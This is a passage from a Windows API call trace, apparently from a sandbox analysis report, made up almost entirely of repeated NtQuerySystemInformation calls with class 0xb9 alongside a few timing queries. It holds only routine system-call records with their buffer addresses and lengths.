ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc30 | out: lpSystemTimeAsFileTime=0xc751dfcc30*(dwLowDateTime=0x2bc1cc2, dwHighDateTime=0x1d5fb6f)) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc20, Length=0x28, ResultLength=0x0) [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0270.885] GetTickCount () returned 0x1184091 [0270.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0270.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0270.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0270.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0270.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0270.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0270.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] 